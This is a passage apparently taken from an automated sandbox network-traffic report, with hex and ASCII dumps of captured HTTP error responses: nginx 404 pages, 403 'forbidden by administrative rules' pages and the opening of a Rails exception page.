Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 05:20:43 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 05:20:43 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 05:20:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 05:20:48 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 05:20:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 78244037-ccc2-4297-85d4-ff9e3a2f927cx-runtime: 0.036430content-length: 16984connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 6cc8d1b1-c997-4ad8-b0ba-aee70f1a65fax-runtime: 0.029674content-length: 17007connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 6423d2d3-1d81-406a-820f-58718bafdc34x-runtime: 0.038536content-length: 18019connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 